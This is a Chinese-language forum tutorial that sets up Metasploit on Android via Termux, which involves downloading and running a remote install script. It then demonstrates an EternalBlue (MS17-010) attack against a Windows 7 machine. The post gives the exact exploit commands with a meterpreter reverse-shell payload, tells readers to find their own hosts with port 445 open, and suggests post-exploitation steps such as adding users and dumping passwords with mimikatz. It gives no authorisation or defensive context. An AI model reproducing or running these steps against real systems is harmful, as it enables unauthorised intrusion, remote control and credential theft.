[标题] 在Android安装MSF并对Windows发起永恒之蓝攻击 (阅424)
[时间] 2018-03-09 21:42:16

简介:MSF全称是Metasploit Framework,是一款强大的渗透测试平台,其中包括了很多渗透测试利器,简称MSF。今天我就演示如何在手机上运行Metasploit并且实现【永恒之蓝】渗透内网windows主机!由于安卓平台的特殊性,要在Termux上部署MSF!

关于Termux相关介绍和下载地址请前往http://yunhai.info/topic_view.php?id=7

重要提醒:强烈建议用联通4g网络安装MSF,安装出错90%都是由于网络问题导致的!!!


步骤1: 下载并安装Termux,第一次启动会下载系统,加载速度由网络决定。(如果不翻墙下载会很慢很慢)


步骤2: 执行apt update && apt upgrade命令,Termux将会更新软件源并升级软件包。(遇到Do you want to continue? [Y/n]之类的提示就输入Y回车即可)


步骤3: 执行pkg install wget命令,Termux将会安装wget。(遇到Do you want to continue? [Y/n]之类的提示就输入Y回车即可)


步骤4: 执行wget https://Auxilus.github.io/metasploit.sh命令,Termux将会下载MSF安装脚本。


步骤5: 执行bash metasploit.sh命令,Termux将会自动安装MSF。(在此过程中会提示安装多个软件包,输入y回车即可,请耐心等待!我安装的时候整整花了半个小时!)


步骤6: 以上所有步骤完成之后,执行cd metasploit-framework再执行./msfconsole命令即可启动metasploit神器!(启动速度有点慢,一般不会超过3分钟)★启动界面如图1所示。

到这里Metasploit的安装就完成了!下面我演示一下攻击windows的‘永恒之蓝’漏洞:

第一步,首先要找到一个开着445端口的靶机的ip,你可以用nmap扫描网段,也可以自己找,找ip的方法靠自己。这里我就示范一下攻击10.13.175.63这台windows7,先启动msf,然后执行下面的命令:


use exploit/windows/smb/ms17_010_eternalblue
set rhost 10.13.175.63
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.13.175.174
set lport 5555
exploit


解释一下语句的作用:
use exploit/windows/smb/ms17_010_eternalblue就是使用ms17_010_eternalblue永恒之蓝模块;
set rhost 10.13.175.63就是设置靶机ip地址;
set lhost 10.13.175.174就是设置本机ip地址;你需要使用就修改两个ip地址就行了,其它不用修改。


★入侵成功如图2所示。


现在这台电脑就相当于被我拿下了,这时候执行screenshot可以获得该电脑的截图,执行shell可以在该电脑运行cmd命令,并可以添加用户,执行load mimikatz加载密码模块,使用命令wdigest获取电脑的账户密码,还有开启远程端口直接用自己的电脑控制那台windows等等等等,此处省略一万字。这里我就拿永恒之蓝作为例子,更多新技术你们自己去谷歌学习吧!

声明:本文章谢绝转载!云海网版权所有!

共有3个附件:
1.Screenshot_2018-03-09-22-39-14-102_com.termux.png(106.55KB)


2.Screenshot_2018-03-09-22-40-07-049_com.termux.png(264.61KB)


3.1440.png(83.54KB)


[楼主] JonyFish (ID:1)
[签名] 太有个性,无需签名
[操作]管理帖子 追加附件

如需回复请先登录

[4楼] 123456789:???
(2018-11-10 22:16:42)

[3楼] 159:很久很久以前吧。 (2018-10-14 15:30:47)

[2楼] yovter:直接用Linux会不会更方便! (2018-10-11 05:02:44)

[1楼] 宋淼淼淼:111111。。 (2018-06-12 14:50:56)

返回首页